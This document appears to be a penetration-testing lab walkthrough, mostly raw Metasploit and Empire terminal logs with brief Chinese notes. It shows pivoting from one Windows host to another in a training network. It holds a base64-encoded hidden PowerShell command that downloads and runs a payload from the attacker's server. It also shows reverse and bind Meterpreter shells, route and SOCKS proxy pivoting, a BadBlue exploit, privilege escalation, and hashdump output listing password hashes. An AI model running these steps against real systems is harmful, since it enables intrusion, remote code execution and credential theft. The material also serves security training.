0 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
1 exploit/multi/script/web_delivery 2013-07-19 manual No Script Web Delivery
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery
msf6 > use 1
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
msf6 exploit(multi/script/web_delivery) > set target PSH
target => PSH
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PSH
msf6 exploit(multi/script/web_delivery) > set SRVHOST 10.10.16.2
SRVHOST => 10.10.16.2
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set LHOST 10.10.16.2
LHOST => 10.10.16.2
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Using URL: http://10.10.16.2:8080/ih5YT1w
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABrAHUAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAawB1AC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAawB1AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMgA6ADgAMAA4ADAALwBpAGgANQBZAFQAMQB3AC8AMABXAE4AWQBFAGUANgBBAGwATwBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADYALgAyADoAOAAwADgAMAAvAGkAaAA1AFkAVAAxAHcAJwApACkAOwA=
msf6 exploit(multi/script/web_delivery) >
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| (Empire: W3986BFX) > usemodule powershell/code_execution/invoke_metasploitpayload
[*] Set Agent to W3986BFX
Author @jaredhaight
Background False
Comments https://github.com/jaredhaight/Invoke-MetasploitPayload/
Description Spawns a new, hidden PowerShell window that downloadsand executes a
Metasploit payload. This relies on
theexploit/multi/scripts/web_delivery metasploit module.
Language powershell
Name powershell/code_execution/invoke_metasploitpayload
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1055
┌Record Options────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├───────┼──────────┼──────────┼─────────────────────────────────────┤
│ Agent │ W3986BFX │ True │ Agent to run Metasploit payload on. │
├───────┼──────────┼──────────┼─────────────────────────────────────┤
│ URL │ │ True │ URL from the Metasploit │
│ │ │ │ web_delivery module │
└───────┴──────────┴──────────┴─────────────────────────────────────┘
(Empire: usemodule/powershell/code_execution/invoke_metasploitpayload) > set URL http://10.10.16.2:8080/ih5YT1w
[*] Set URL to http://10.10.16.2:8080/ih5YT1w
(Empire: usemodule/powershell/code_execution/invoke_metasploitpayload) > execute
[*] Tasked W3986BFX to run Task 4
(Empire: W3986BFX) >
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| msf6 exploit(multi/script/web_delivery) > [*] 10.0.26.27 web_delivery - Delivering Payload (3520 bytes)
[*] Sending stage (175174 bytes) to 10.0.26.27
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.0.26.27:49468 ) at 2024-06-15 16:10:34 +0530
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ ATTACKDEFENSE 10.10.16.2:4444 -> 10.0.26.27:49468 (10.0.26.27)
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Background session 1? [y/N]
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| msf6 exploit(multi/script/web_delivery) > search autoroute
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/autoroute normal No Multi Manage Network Route via Meterpreter Session
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/autoroute
msf6 exploit(multi/script/web_delivery) > use 0
msf6 post(multi/manage/autoroute) > show options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
SESSION yes The session to run this module on
SUBNET no Subnet (IPv4, for example, 10.10.10.0)
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against ATTACKDEFENSE
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.16.0/255.255.240.0 from host's routing table.
[*] Post module execution completed
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set SRVHOST 10.10.16.2
SRVHOST => 10.10.16.2
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 2.
[*] Starting the SOCKS proxy server
|
在Firefox的Network Settings中,选择Manual proxy configuration, 然后将SOCKS Host设置为10.10.16.2(Kali),将Port设置为1080。
然后再访问:fileServer.ine.local,就可以看到Badblue的页面了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| msf6 exploit(windows/http/badblue_passthru) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/http/badblue_passthru) > show options
Module options (exploit/windows/http/badblue_passthru):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.20.241 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 8848 yes The listen port
RHOST 10.0.20.241 no The target address
Exploit target:
Id Name
-- ----
1 BadBlue 2.72b Universal
msf6 exploit(windows/http/badblue_passthru) > run
[*] Trying target BadBlue 2.72b Universal...
[*] Started bind TCP handler against 10.0.20.241:8848
[*] Sending stage (175174 bytes) to 10.0.20.241
[*] Meterpreter session 2 opened (10.0.26.27:49715 -> 10.0.20.241:8848 via session 1) at 2024-06-15 16:56:42 +0530
meterpreter > sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: ATTACKDEFENSE\Administrator
meterpreter > cat c:\\flag.txt
c46d12f28d87ae0b92b05ebd9fb8e817
|
1
2
3
4
5
6
7
8
9
10
11
| meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/http/badblue_passthru) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ ATTACKDEFENSE 10.10.16.2:4444 -> 10.0.26.27:49468 (10.0.26.27)
2 meterpreter x86/windows ATTACKDEFENSE\Administrator @ ATTACKDEFENSE 10.0.26.27:49715 -> 10.0.20.241:8848 via session 1 (10.0.20.241)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 37cbff09ae8a6e2a3db546e135ca4650...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
local_admin:"yes"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
local_admin:1009:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd:::
meterpreter >
Background session 1? [y/N]
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| msf6 exploit(windows/http/badblue_passthru) > sessions 2
[*] Starting interaction with 2...
meterpreter > use priv
[!] The "priv" extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 377af0de68bdc918d22c57a263d38326...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
student:1008:aad3b435b51404eeaad3b435b51404ee:bd4ca1fbe028f3c5066467a7f6a73b0b:::
|
Meterpreter Basics
